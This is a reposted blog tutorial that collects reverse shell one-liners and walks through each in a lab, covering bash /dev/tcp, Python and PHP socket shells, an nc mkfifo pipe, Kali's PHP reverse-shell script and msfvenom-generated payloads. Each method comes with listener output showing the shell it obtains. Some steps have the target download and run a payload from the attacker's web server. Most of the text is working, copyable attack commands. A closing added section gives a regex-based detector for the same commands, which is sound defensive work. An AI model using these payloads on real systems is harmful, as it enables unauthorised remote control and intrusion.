Summary of commonly used reverse shell one-liners


Article reposted from: https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F%8D%E5%BC%B9

When I first started I didn't even really know what a shell was. I remember a book whose cover showed a sitting penguin and the words "Linux shell", which is when I learned that the shell is a programming language unique to Linux.

I often hear the experts talk about this or that reverse shell, so today I'm going to study it systematically. Yesterday I even spent time learning shell scripting for this, and it doesn't seem to have much to do with reverse shells......

Contents

Summary of commonly used reverse shell one-liners

1. Direct reverse shell with bash
2. Python reverse shell one-liner
3. Python script reverse shell
4. PHP reverse shell one-liner
5. PHP script reverse shell
6. Getting a reverse shell from the target with the nc command
7. Getting a reverse shell with the script files bundled with Kali
8. Generating a reverse shell one-liner with msfvenom


1. Direct reverse shell with bash

1.1> Start the listener on the listening machine

nc -nvlp 8080

1.2> On the target host, enter the bash reverse shell one-liner

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1                      // note: 192.168.37.131 is the attacker machine, i.e. the hacker's IP

 

Explanation of the command

        bash -i: spawn an interactive bash;

        >&: redirect both the standard output and the standard error of the command before it to the target that follows;

        /dev/tcp/192.168.37.131/8080: a pseudo-device built into bash; opening it establishes a TCP connection to 192.168.37.131 on port 8080;

        0>&1: redirect standard input to wherever standard output currently points, i.e. the same TCP connection, so commands are read from the socket and their output is sent back over it;

1.3> Check whether the listening machine has received the shell;

    root@root:~# nc -nvlp 8080
    listening on [any] 8080 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567
    [tom@redhat home]$ whoami                         // as you can see, we are now connected to tom's host
    whoami
    tom
    [tom@redhat home]$ pwd
    pwd
    /home
    [tom@redhat home]$

2. Python reverse shell one-liner

2.1> Listen on port 1234 directly on Kali, and run the following command on the target:

    Start the listener on Kali
    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...

On the attacked side, i.e. on the target, run:

    [tom@redhat tmp]$ python -c 'import socket,subprocess,os;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);
    p=subprocess.call(["/bin/sh","-i"]);'
     

 

2.2> On Kali, check the listener on port 1234 and receive the reverse shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065
    sh-4.1$ whoami                               // as you can see, the listener caught the connection
    whoami                                                  
    tom
    sh-4.1$ 

3. Python script reverse shell

This is no different from the Python one-liner above; it simply has the target download the script from the attacker machine and execute it.

3.1> Prepare shell.py in Kali's web root and run python -m SimpleHTTPServer 80 to bring up a simple web server (note: the web server is started in /var/www/html; alternatively you can just start Apache with /etc/init.d/apache2 start);

    root@root:~# cd /var/www/html/
    root@root:/var/www/html# vim shell.py
    root@root:/var/www/html# cat shell.py   # contents of shell.py
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.37.131",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/bash","-i"])
    root@root:/var/www/html# /etc/init.d/apache2 start     # start the Apache service
    [ ok ] Starting apache2 (via systemctl): apache2.service.

 


3.2> Download the Python shell script onto the target system (usually into /tmp);

    [tom@redhat tmp]$ wget http://192.168.37.131/shell.py
    --2019-05-20 13:54:58--  http://192.168.37.131/shell.py
    正在連接 192.168.37.131:80... 已連接。
    已發出 HTTP 請求,正在等待回應... 200 OK
    長度:218 [text/x-python]
    正在保存至: “shell.py.1”
     
    100%[======================================>] 218         --.-K/s   in 0s      
     
    2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])

 


3.3> Once the download succeeds, start listening on port 1234 on Kali and run the Python script on the target;

Start listening on port 1234 on Kali:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...

 


On the target, run the downloaded Python script:

[tom@redhat tmp]$ python shell.py

 


3.4> Check port 1234 on Kali and receive the target's reverse shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35053
    [tom@redhat tmp]$ whoami
    whoami
    tom
    [tom@redhat tmp]$ ifconfig
    ifconfig
    eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
              inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2605 errors:0 dropped:0 overruns:0 frame:0
              TX packets:286 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:186570 (182.1 KiB)  TX bytes:24850 (24.2 KiB)

 


4. PHP reverse shell one-liner

4.1> Listen on port 1234 directly on Kali, and run the following command on the target:

    root@root:/var/www/html# nc -nvlp 1234              // attacker machine
    listening on [any] 1234 ...  

 

    [tom@redhat tmp]$ php -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'      // target

 

 

 

4.2> On Kali, check the listener on port 1234 and receive the reverse shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35064
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ 

 

4.3> Upgrade the shell to an interactive TTY;

   python -c 'import pty;pty.spawn("/bin/bash")'

    sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'                      // not quite sure what this means
    [tom@redhat tmp]$ whoami
    whoami
    tom
    [tom@redhat tmp]$ 

 

5. PHP script reverse shell

5.1> Add shell.php on Kali and start the Apache service;

<?php 
$sock=fsockopen("192.168.37.131",1234);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

 

 

/etc/init.d/apache2 start

    root@root:~# cd /var/www/html/
    root@root:/var/www/html# vim shell.php
    root@root:/var/www/html# cat shell.php    # the PHP script
    <?php $sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
    root@root:/var/www/html# /etc/init.d/apache2 start   # start the Apache service
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    root@root:/var/www/html# 

 

5.2> Download the script on the target;

    [tom@redhat tmp]$ wget http://192.168.37.131/shell.php
    --2019-05-20 14:21:56--  http://192.168.37.131/shell.php
    正在連接 192.168.37.131:80... 已連接。
    已發出 HTTP 請求,正在等待回應... 200 OK
    長度:80 [text/plain]
    正在保存至: “shell.php”
     
    100%[======================================>] 80          --.-K/s   in 0s      
     
    2019-05-20 14:21:56 (4.53 MB/s) - 已保存 “shell.php” [80/80])

5.3> Once the download succeeds, start listening on port 1234 on Kali and run the PHP script on the target;

Start listening on port 1234 on Kali:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...

On the target, run the downloaded PHP script:

[tom@redhat tmp]$ php shell.php

 

5.4> Check port 1234 on Kali and receive the target's reverse shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35063
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ ifconfig
    ifconfig
    eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
              inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2748 errors:0 dropped:0 overruns:0 frame:0
              TX packets:369 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:204505 (199.7 KiB)  TX bytes:32844 (32.0 KiB)

 

6. Getting a reverse shell from the target with the nc command;

6.1> Enter the following command on the target;

[tom@redhat tmp]$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f;
// One doubt here: can the nc command be used even if the target doesn't have netcat installed? I asked an expert, and it can't; the target must have netcat installed for the nc command to work
Question: Experts, when using nc to get a reverse shell from the target, does the target also need netcat installed?
Answer: Not necessarily. You are focusing on receiving the shell with nc, but the target can send the shell in many ways; Linux can use bash, Windows can use PowerShell.

6.2> Listen on port 1234 on Kali;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35067
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ 

 


7. Getting a reverse shell with the script files bundled with Kali

7.1> Look at php-reverse-shell.php on Kali, save a copy and change the listening IP address;

    root@root:~# cd /usr/share/webshells/
    root@root:/usr/share/webshells# ls
    asp  aspx  cfm  jsp  perl  php
    root@root:/usr/share/webshells# cd php
    root@root:/usr/share/webshells/php# ls
    findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
    php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
    root@root:/usr/share/webshells/php# cat php-reverse-shell.php
    <?php
    // php-reverse-shell - A Reverse Shell implementation in PHP
    // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
    //
    // This tool may be used for legal purposes only.  Users take full responsibility
    ......

    root@root:/usr/share/webshells/php# cp php-reverse-shell.php /var/www/html/
    root@root:/usr/share/webshells/php# cd /var/www/html/
    root@root:/var/www/html# ls
    1.html   a.js             index.html               shell.elf
    1.php    decode.py        index.nginx-debian.html  shell.php
    2.html   dirty.c          php-reverse-shell.php    shell.py
    37292.c  dirtycow-master  shell.c                  shell.txt
    root@root:/var/www/html# vim php-reverse-shell.php
    root@root:/var/www/html# cat php-reverse-shell.php   # change the listening IP address
    ......
    // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
     
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '192.168.37.131';  // CHANGE THIS      # change the IP address
    $port = 1234;       // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    ......
    root@root:/var/www/html# /etc/init.d/apache2 start
    [ ok ] Starting apache2 (via systemctl): apache2.service.

 


7.2> Upload the file to the target, listen on port 1234, execute the file and receive the reverse shell;

8. Generating a reverse shell one-liner with msfvenom

When we can't remember all the reverse shell commands above, as long as we have Metasploit we can generate whatever command-line one-liner we need. Usage is as follows:

8.1 Finding the exact payload path

We can run msfvenom -l with a keyword filter (e.g. cmd/unix/reverse) to list the paths of the various reverse shell one-liner payloads we need. Finding the Windows ones works the same way!!!

    root@root:~# msfvenom -l payloads |grep "cmd/unix/reverse"
        cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
        cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
        cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
        cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
        cmd/unix/reverse_lua                                Creates an interactive shell via Lua
        cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
        cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
        cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
        cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
        cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
        cmd/unix/reverse_perl                               Creates an interactive shell via perl
        cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
        cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
        cmd/unix/reverse_python                             Connect back and create a command shell via Python
        cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
        cmd/unix/reverse_r                                  Connect back and create a command shell via R
        cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
        cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
        cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
        cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
        cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
        cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.

 

 



8.2> Generate the reverse shell one-liner we need;

    msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R      # bash reverse shell one-liner

    msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R    # nc reverse shell one-liner

    msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R  # python reverse shell one-liner

    ......

    root@root:~# msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 68 bytes
    0<&178-;exec 178<>/dev/tcp/192.168.37.131/1234;sh <&178 >&178 2>&178
     
    root@root:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 93 bytes
    mkfifo /tmp/fqzh; nc 192.168.37.131 1234 0</tmp/fqzh | /bin/sh >/tmp/fqzh 2>&1; rm /tmp/fqzh
    root@root:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 573 bytes
    python -c "exec('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'.decode('base64'))"

 

8.3> Listen on the port on Kali, run the generated one-liner on the target, and you get the target's reverse shell;
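For the detection side of the same commands, here is an added example that is not from the original post: a small Python signature matcher a defender could run over process command lines (collected from auditd EXECVE records or ps -eo args, for instance) to flag the one-liners shown in this article, including the /dev/tcp and mkfifo/nc forms that msfvenom emits. The signature names, the SIGNATURES table and the SAMPLE command lines are constructed for this example.

```python
import re

# Added example, not from the original post: signatures for the one-liners
# shown in this article, matched against process command lines (e.g. from
# auditd EXECVE records or `ps -eo args`). Names and patterns are my own.
SIGNATURES = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("python socket+dup2 shell", re.compile(r"socket\.socket\(.*os\.dup2\(.*/bin/(?:ba)?sh")),
    ("php fsockopen+exec shell", re.compile(r"fsockopen\(.*exec\(")),
    ("mkfifo/nc pipe shell", re.compile(r"mkfifo\s+\S+.*\b(?:nc|ncat|netcat)\s+\S+\s+\d+")),
    ("pty.spawn tty upgrade", re.compile(r"pty\.spawn\(")),
    ("numbered-fd /dev/tcp exec", re.compile(r"exec\s+\d+<>/dev/tcp/")),
]

def classify(cmdline):
    """Return the names of every signature that matches one command line."""
    return [name for name, rx in SIGNATURES if rx.search(cmdline)]

def scan(lines):
    """Return [(cmdline, matches)] for the lines that hit at least one signature."""
    hits = []
    for line in lines:
        matches = classify(line)
        if matches:
            hits.append((line, matches))
    return hits

# Constructed sample: the article's own one-liners plus two benign commands.
SAMPLE = [
    "bash -i >& /dev/tcp/192.168.37.131/8080 0>&1",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"192.168.37.131\",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "php -r '$sock=fsockopen(\"192.168.37.131\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f",
    "0<&178-;exec 178<>/dev/tcp/192.168.37.131/1234;sh <&178 >&178 2>&178",
    "python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "tar czf /tmp/backup.tgz /etc",
    "nc -z 10.0.0.5 443",
]

if __name__ == "__main__":
    for cmdline, matches in scan(SAMPLE):
        print("%-40s <- %s" % (", ".join(matches), cmdline[:60]))
```

The msfvenom reverse_bash output trips two signatures at once (the generic /dev/tcp pattern and the numbered-fd exec form), which is useful for prioritising alerts; a plain port probe like nc -z is deliberately not flagged.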

 

